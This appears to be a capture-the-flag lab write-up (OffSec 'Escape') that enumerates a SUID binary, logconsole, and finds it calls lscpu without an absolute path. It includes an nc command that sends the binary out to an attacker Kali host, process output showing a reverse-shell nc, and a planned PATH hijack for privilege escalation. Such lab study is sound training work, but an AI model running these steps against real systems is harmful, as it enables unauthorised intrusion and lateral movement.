logconsole
An unknown SUID binary has been identified. PEAS has found it as well
/Practice/Escape_OffSec/4-Post_Enumeration/attachments/Pasted-image-20250306182508.png)
The binary’s ownership is set to the tom user, who is a valid system user
Debian-snmp@escape:/var/tmp$ /usr/bin/logconsole
/usr/bin/logconsole
/$$ /$$
| $$ | $$
| $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$ /$$$$$$ | $$ /$$$$$$
| $$ /$$__ $$ /$$__ $$ /$$_____/ /$$__ $$| $$__ $$ /$$_____/ /$$__ $$| $$ /$$__ $$
| $$| $$ \ $$| $$ \ $$| $$ | $$ \ $$| $$ \ $$| $$$$$$ | $$ \ $$| $$| $$$$$$$$
| $$| $$ | $$| $$ | $$| $$ | $$ | $$| $$ | $$ \____ $$| $$ | $$| $$| $$_____/
| $$| $$$$$$/| $$$$$$$| $$$$$$$| $$$$$$/| $$ | $$ /$$$$$$$/| $$$$$$/| $$| $$$$$$$
|__/ \______/ \____ $$ \_______/ \______/ |__/ |__/|_______/ \______/ |__/ \_______/
/$$ \ $$
| $$$$$$/
\______/
1. About the Sytem
2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit
99. Generate the Report
Enter the option ==> Executing the binary prompts for option
Option 1
Enter the option ==> 1
Linux escape 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 x86_64 x86_64 GNU/LinuxThe option 1 appears to execute uname -a
Option 2
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.9 159672 9084 ? Ss 11:37 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 11:37 0:00 [kthreadd]
root 4 0.0 0.0 0 0 ? I< 11:37 0:00 [kworker/0:0H]
root 6 0.0 0.0 0 0 ? I< 11:37 0:00 [mm_percpu_wq]
root 7 0.0 0.0 0 0 ? S 11:37 0:00 [ksoftirqd/0]
root 8 0.0 0.0 0 0 ? I 11:37 0:00 [rcu_sched]
root 9 0.0 0.0 0 0 ? I 11:37 0:00 [rcu_bh]
root 10 0.0 0.0 0 0 ? S 11:37 0:00 [migration/0]
root 11 0.0 0.0 0 0 ? S 11:37 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S 11:37 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S 11:37 0:00 [kdevtmpfs]
root 14 0.0 0.0 0 0 ? I< 11:37 0:00 [netns]
root 15 0.0 0.0 0 0 ? S 11:37 0:00 [rcu_tasks_kthr
root 16 0.0 0.0 0 0 ? S 11:37 0:00 [kauditd]
root 17 0.0 0.0 0 0 ? S 11:37 0:00 [khungtaskd]
root 18 0.0 0.0 0 0 ? S 11:37 0:00 [oom_reaper]
root 19 0.0 0.0 0 0 ? I< 11:37 0:00 [writeback]
root 20 0.0 0.0 0 0 ? S 11:37 0:00 [kcompactd0]
root 21 0.0 0.0 0 0 ? SN 11:37 0:00 [ksmd]
root 22 0.0 0.0 0 0 ? SN 11:37 0:00 [khugepaged]
root 23 0.0 0.0 0 0 ? I< 11:37 0:00 [crypto]
root 24 0.0 0.0 0 0 ? I< 11:37 0:00 [kintegrityd]
root 25 0.0 0.0 0 0 ? I< 11:37 0:00 [kblockd]
root 26 0.0 0.0 0 0 ? I< 11:37 0:00 [ata_sff]
root 27 0.0 0.0 0 0 ? I< 11:37 0:00 [md]
root 28 0.0 0.0 0 0 ? I< 11:37 0:00 [edac-poller]
root 29 0.0 0.0 0 0 ? I< 11:37 0:00 [devfreq_wq]
root 30 0.0 0.0 0 0 ? I< 11:37 0:00 [watchdogd]
root 31 0.0 0.0 0 0 ? I 11:37 0:00 [kworker/u2:1]
root 32 0.0 0.0 0 0 ? I 11:37 0:00 [kworker/0:1]
root 34 0.0 0.0 0 0 ? S 11:37 0:00 [kswapd0]
root 35 0.0 0.0 0 0 ? I< 11:37 0:00 [kworker/u3:0]
root 36 0.0 0.0 0 0 ? S 11:37 0:00 [ecryptfs-kthre
root 78 0.0 0.0 0 0 ? I< 11:37 0:00 [kthrotld]
root 79 0.0 0.0 0 0 ? I< 11:37 0:00 [acpi_thermal_p
root 80 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_0]
root 81 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_0]
root 82 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_1]
root 83 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_1]
root 89 0.0 0.0 0 0 ? I< 11:37 0:00 [ipv6_addrconf]
root 99 0.0 0.0 0 0 ? I< 11:37 0:00 [kstrp]
root 117 0.0 0.0 0 0 ? I< 11:37 0:00 [charger_manage
root 175 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_2]
root 176 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_3]
root 177 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_2]
root 178 0.0 0.0 0 0 ? I< 11:37 0:00 [vmw_pvscsi_wq_
root 179 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_3]
root 180 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_4]
root 181 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_4]
root 182 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_5]
root 183 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_5]
root 184 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_6]
root 186 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_6]
root 192 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_7]
root 199 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_7]
root 205 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_8]
root 207 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_8]
root 209 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_9]
root 212 0.0 0.0 0 0 ? I< 11:37 0:00 [ttm_swap]
root 213 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_9]
root 215 0.0 0.0 0 0 ? S 11:37 0:00 [irq/16-vmwgfx]
root 216 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_10]
root 219 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_10]
root 222 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_11]
root 224 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_11]
root 226 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_12]
root 227 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_12]
root 231 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_13]
root 232 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_13]
root 234 0.0 0.0 0 0 ? I< 11:37 0:00 [kworker/0:1H]
root 235 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_14]
root 237 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_14]
root 239 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_15]
root 240 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_15]
root 242 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_16]
root 243 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_16]
root 245 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_17]
root 247 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_17]
root 248 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_18]
root 250 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_18]
root 251 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_19]
root 253 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_19]
root 255 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_20]
root 256 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_20]
root 258 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_21]
root 260 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_21]
root 262 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_22]
root 264 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_22]
root 266 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_23]
root 268 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_23]
root 269 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_24]
root 270 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_24]
root 271 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_25]
root 272 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_25]
root 273 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_26]
root 274 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_26]
root 275 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_27]
root 276 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_27]
root 277 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_28]
root 278 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_28]
root 279 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_29]
root 280 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_29]
root 281 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_30]
root 282 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_30]
root 283 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_31]
root 284 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_31]
root 285 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_32]
root 286 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_32]
root 385 0.0 0.0 0 0 ? I< 11:37 0:00 [raid5wq]
root 441 0.0 0.0 0 0 ? S 11:37 0:00 [jbd2/sda1-8]
root 442 0.0 0.0 0 0 ? I< 11:37 0:00 [ext4-rsv-conve
root 502 0.0 1.0 78456 10544 ? S<s 11:37 0:00 /lib/systemd/sy
root 516 0.0 0.0 0 0 ? I< 11:37 0:00 [iscsi_eh]
root 518 0.1 0.7 48416 7288 ? Ss 11:37 0:03 /lib/systemd/sy
root 524 0.0 0.0 0 0 ? I< 11:37 0:00 [ib-comp-wq]
root 525 0.0 0.0 0 0 ? I< 11:37 0:00 [ib-comp-unb-wq
root 526 0.0 0.0 0 0 ? I< 11:37 0:00 [ib_mcast]
root 527 0.0 0.0 0 0 ? I< 11:37 0:00 [ib_nl_sa_wq]
root 528 0.0 0.1 97716 1716 ? Ss 11:37 0:00 /sbin/lvmetad -
root 539 0.0 0.0 0 0 ? I< 11:37 0:00 [rdma_cm]
systemd+ 691 0.0 0.3 141964 3300 ? Ssl 11:37 0:00 /lib/systemd/sy
systemd+ 694 0.0 0.5 70672 5360 ? Ss 11:37 0:00 /lib/systemd/sy
root 702 0.0 0.9 91164 9988 ? Ss 11:37 0:00 /usr/bin/VGAuth
root 703 0.0 0.7 227020 7500 ? S<sl 11:37 0:01 /usr/bin/vmtool
root 715 0.0 0.1 161084 1680 ? Ssl 11:37 0:00 /usr/bin/lxcfs
message+ 717 0.0 0.4 50052 4544 ? Ss 11:37 0:00 /usr/bin/dbus-d
root 785 0.0 1.7 170400 17220 ? Ssl 11:37 0:00 /usr/bin/python
root 787 0.0 0.6 287552 6844 ? Ssl 11:37 0:00 /usr/lib/accoun
root 788 0.0 0.5 62168 5724 ? Ss 11:37 0:00 /lib/systemd/sy
daemon 789 0.0 0.2 28340 2484 ? Ss 11:37 0:00 /usr/sbin/atd -
syslog 790 0.0 0.4 263044 4900 ? Ssl 11:37 0:00 /usr/sbin/rsysl
root 802 0.0 0.3 31328 3108 ? Ss 11:37 0:00 /usr/sbin/cron
Debian-+ 804 0.0 1.1 65684 11644 ? Ss 11:37 0:00 /usr/sbin/snmpd
root 826 0.0 4.1 674684 41512 ? Ssl 11:37 0:00 /usr/bin/contai
root 837 0.0 1.9 187128 20104 ? Ssl 11:37 0:00 /usr/bin/python
root 876 0.0 0.6 288888 6488 ? Ssl 11:37 0:00 /usr/lib/policy
root 1176 0.0 8.3 839324 84100 ? Ssl 11:39 0:00 /usr/bin/docker
root 1189 0.0 0.5 72308 5768 ? Ss 11:39 0:00 /usr/sbin/sshd
root 1236 0.0 0.1 16188 1996 tty1 Ss+ 11:39 0:00 /sbin/agetty -o
root 1290 0.0 1.6 329200 17072 ? Ss 11:39 0:00 /usr/sbin/apach
www-data 1301 0.0 0.8 333600 8988 ? S 11:39 0:00 /usr/sbin/apach
www-data 1302 0.0 0.8 333600 8988 ? S 11:39 0:00 /usr/sbin/apach
www-data 1303 0.0 0.8 333600 8988 ? S 11:39 0:00 /usr/sbin/apach
www-data 1304 0.0 0.8 333600 8988 ? S 11:39 0:00 /usr/sbin/apach
www-data 1305 0.0 0.8 333600 8988 ? S 11:39 0:00 /usr/sbin/apach
root 1535 0.0 0.3 478540 3048 ? Sl 11:39 0:00 /usr/bin/docker
root 1542 0.0 0.5 9364 5336 ? Sl 11:39 0:00 containerd-shim
root 1559 0.0 2.3 82892 24120 ? Ss 11:39 0:00 apache2 -DFOREG
www-data 1668 0.0 0.6 82916 7016 ? S 11:39 0:00 apache2 -DFOREG
www-data 1669 0.0 0.6 82916 7016 ? S 11:39 0:00 apache2 -DFOREG
www-data 1670 0.0 0.6 82916 7016 ? S 11:39 0:00 apache2 -DFOREG
www-data 1671 17.4 1.0 83028 10912 ? R 11:39 8:13 apache2 -DFOREG
www-data 1672 0.0 1.1 83208 11508 ? S 11:39 0:00 apache2 -DFOREG
systemd+ 2127 0.0 0.5 72028 5172 ? Ss 12:18 0:00 /lib/systemd/sy
root 2142 0.0 0.0 0 0 ? I 12:18 0:00 [kworker/u2:3]
root 2195 0.0 0.0 0 0 ? I 12:18 0:00 [kworker/0:0]
www-data 2301 0.0 0.6 82916 7016 ? S 12:18 0:00 apache2 -DFOREG
www-data 2302 0.0 0.6 82916 7016 ? S 12:18 0:00 apache2 -DFOREG
www-data 2303 0.0 0.0 2388 692 ? S 12:18 0:00 sh -c bash
www-data 2304 0.0 0.2 3736 2748 ? S 12:18 0:00 bash
www-data 2308 0.0 0.1 2592 1792 ? S 12:18 0:00 script /dev/nul
www-data 2309 0.0 0.0 2388 696 pts/0 Ss 12:18 0:00 sh -c bash
www-data 2310 0.0 0.3 3868 3180 pts/0 S+ 12:18 0:00 bash
Debian-+ 2317 0.0 0.0 4636 820 ? S 12:18 0:00 sh -c /bin/sh /
Debian-+ 2318 0.0 0.0 4636 860 ? S 12:18 0:00 /bin/sh /tmp/sh
Debian-+ 2320 0.0 0.2 15720 2164 ? S 12:18 0:00 nc 192.168.45.1
Debian-+ 2321 0.0 0.0 4636 780 ? S 12:18 0:00 /bin/sh
Debian-+ 2324 0.0 0.2 22252 2600 ? S 12:18 0:00 script /dev/nul
Debian-+ 2325 0.0 0.0 4636 812 pts/0 Ss 12:18 0:00 sh -c bash
Debian-+ 2326 0.0 0.3 21480 4012 pts/0 S 12:18 0:00 bash
Debian-+ 2402 0.0 0.0 4524 720 pts/0 S+ 12:25 0:00 /usr/bin/logcon
tom 2406 0.0 0.0 4636 824 pts/0 S+ 12:26 0:00 sh -c /bin/ps a
tom 2407 0.0 0.3 39672 3576 pts/0 R+ 12:26 0:00 /bin/ps auxThe option 2 shows the output of ps command
Option 3
Enter the option ==> 3
3
reboot system boot 4.15.0-124-gener Sat Mar 1 04:43 still running
reboot system boot 4.15.0-124-gener Fri Aug 2 20:14 still running
wtmp begins Fri Aug 2 20:14:35 2024The option 3 shows output of the last reboot command
Option 4
Enter the option ==> 4
4
12:28:06 up 51 min, 0 users, load average: 1.00, 0.88, 0.49
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATThe option 4 shows the output of the w command
Option 5
Enter the option ==> 5
5
default via 192.168.122.254 dev ens192 proto static
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
192.168.122.0/24 dev ens192 proto kernel scope link src 192.168.122.113This appears to be output of the ip route command
Option 6
Enter the option ==> 6
6
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 1
On-line CPU(s) list: 0
Thread(s) per core: 1
Core(s) per socket: 1
Socket(s): 1
NUMA node(s): 1
Vendor ID: AuthenticAMD
CPU family: 25
Model: 1
Model name: AMD EPYC 7413 24-Core Processor
Stepping: 1
CPU MHz: 2649.999
BogoMIPS: 5299.99
Hypervisor vendor: VMware
Virtualization type: full
L1d cache: 32K
L1i cache: 32K
L2 cache: 512K
L3 cache: 131072K
NUMA node0 CPU(s): 0
Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw invpcid_single ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves clzero arat umip pku ospke vaes vpclmulqdq rdpid overflow_recov succorThis is from the lscpu command
Option 99
Enter the option ==> 99
99
Segmentation fault (core dumped)The option 99 is supposed to generate a report but crashed with segfault instead
Analysis
Debian-snmp@escape:/var/tmp$ nc -nv 192.168.45.153 2222 < /usr/bin/logconsole
Connection to 192.168.45.153 2222 port [tcp/*] succeeded!
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ nnc 2222 > logconsole
listening on [any] 2222 ...
connect to [192.168.45.153] from (UNKNOWN) [192.168.122.113] 38040Transferring the binary to Kali for further analysis
strings
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ strings logconsole
/lib64/ld-linux-x86-64.so.2
mgUa
fopen
__isoc99_scanf
setreuid
putchar
stdin
popen
printf
fgets
stdout
fputs
fclose
system
getuid
fwrite
geteuid
__cxa_finalize
setvbuf
__libc_start_main
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
/home/tom/logconsole.txt
*********************************************************************
/$$ /$$
| $$ | $$
| $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$ /$$$$$$ | $$ /$$$$$$
| $$ /$$__ $$ /$$__ $$ /$$_____/ /$$__ $$| $$__ $$ /$$_____/ /$$__ $$| $$ /$$__ $$
| $$| $$ \ $$| $$ \ $$| $$ | $$ \ $$| $$ \ $$| $$$$$$ | $$ \ $$| $$| $$$$$$$$
| $$| $$ | $$| $$ | $$| $$ | $$ | $$| $$ | $$ \____ $$| $$ | $$| $$| $$_____/
| $$| $$$$$$/| $$$$$$$| $$$$$$$| $$$$$$/| $$ | $$ /$$$$$$$/| $$$$$$/| $$| $$$$$$$
|__/ \______/ \____ $$ \_______/ \______/ |__/ |__/|_______/ \______/ |__/ \_______/
/$$ \ $$
| $$$$$$/
\______/
[1;31m
1. About the Sytem
2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit
99. Generate the Report
[01;33m
Enter the option ==>
/bin/uname -a
/bin/ps aux
/usr/bin/last
/usr/bin/w
/sbin/ip route | column -t
lscpu
Invalid Option!!!!!
Report is Ready!!!
;*3$"
GCC: (Debian 10.2.0-7) 10.2.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
syslog.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
stdout@@GLIBC_2.2.5
stdin@@GLIBC_2.2.5
_edata
fclose@@GLIBC_2.2.5
getuid@@GLIBC_2.2.5
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
fputs@@GLIBC_2.2.5
geteuid@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
fgets@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
setreuid@@GLIBC_2.2.5
__bss_start
main
setvbuf@@GLIBC_2.2.5
get_output
popen@@GLIBC_2.2.5
fopen@@GLIBC_2.2.5
__isoc99_scanf@@GLIBC_2.7
fwrite@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.commentChecking the strings within the logconsole binary reveals those commands.
/Practice/Escape_OffSec/4-Post_Enumeration/attachments/Pasted-image-20250306184029.png)
While the majority of those commands are provided with absolute paths, the lscpu doesn’t have its absolute path set to it.
This would mean that I can hijack this binary by altering the PATH variable
Moving on the Lateral Movement phase